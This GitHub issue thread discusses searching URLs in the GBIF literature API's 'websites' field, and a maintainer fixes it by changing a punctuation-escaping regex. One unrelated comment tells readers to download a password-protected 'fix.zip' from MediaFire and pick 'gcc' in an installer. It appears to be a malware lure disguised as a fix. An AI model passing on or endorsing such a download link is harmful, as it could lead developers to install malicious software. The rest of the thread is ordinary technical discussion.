### ISSUE TITLE
searching for websites in literature

### ISSUE THREAD

**Issue by dnoesgaard** [gbif/literature-ws#33]
How can I search for content in the `websites` field?

None of these work:
https://api.gbif.org/v1/literature/search?q=https://doi.org/10.1111/jbi.14969
https://api.gbif.org/v1/literature/search?q=%22https://doi.org/10.1111/jbi.14969%22
https://api.gbif.org/v1/literature/search?q=https%3A%2F%2Fdoi.org%2F10.1111%2Fjbi.14969

Fwiw, I get a hit when querying the ES endpoint directly using double-quotes, e.g.

`/literature/_search?q="https://doi.org/10.1111/jbi.14969"`

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahakanzn** [comment]
Hi Daniel, this one works: https://api.gbif.org/v1/literature/search?DOI=10.1111/jbi.14969

**Comment by dnoesgaard** [comment]
Yup, but some papers don't have DOIs :( My example was a bad one...

**Comment by ahakanzn** [comment]
Oh okay I see, I'll take a look

**Comment by ahakanzn** [comment]
Fixed and deployed to prod

**Comment by ahakanzn** [comment]
`public static final String REGEX_PUNCT_CHARS = "(\\p{Punct})";` 
changed to
`public static final String REGEX_PUNCT_CHARS = "([+\\-!(){}\\[\\]^\"~*?:\\\\/])";`

Also we should write IT tests for literature-ws

**Comment by dnoesgaard** [comment]
Just for my clarity: Does this mean that all queries for anything starting with https:// only searches in `websites`?

**Comment by ahakanzn** [comment]
No it should work for other fields as well, for example:
https://api.gbif.org/v1/literature/search?q=https://api.gbif.org/v1/occurrence/download/0182006-200613084148143
Returns 1 result which contains the url in the abstract field

**Comment by dnoesgaard** [comment]
Ah ok. But only queries starting with http(s) search in `websites`?
